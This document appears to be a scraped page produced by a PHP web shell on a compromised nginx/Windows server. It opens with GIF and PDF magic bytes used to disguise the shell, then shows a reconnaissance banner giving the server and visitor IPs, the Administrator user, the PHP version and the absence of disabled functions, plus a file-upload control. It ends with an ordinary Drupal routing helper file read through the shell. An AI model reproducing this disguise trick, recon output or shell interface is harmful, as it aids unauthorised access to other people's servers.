GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Routing/ |
Upload File : |
<?php namespace Drupal\Core\Routing; use Symfony\Component\HttpFoundation\Request; /** * Provides some helper methods for dealing with the request. */ class RequestHelper { /** * Returns whether the request is using a clean URL. * * A clean URL is one that does not include the script name. For example, * - http://example.com/node/1 is a clean URL. * - http://example.com/index.php/node/1 is not a clean URL. * * Unclean URLs are required on sites hosted by web servers that cannot be * configured to implicitly route URLs to index.php. * * @param \Symfony\Component\HttpFoundation\Request $request * The request. * * @return bool * TRUE if the request is using a clean URL. */ public static function isCleanUrl(Request $request) { $base_url = $request->getBaseUrl(); return (empty($base_url) || strpos($base_url, $request->getScriptName()) === FALSE); } }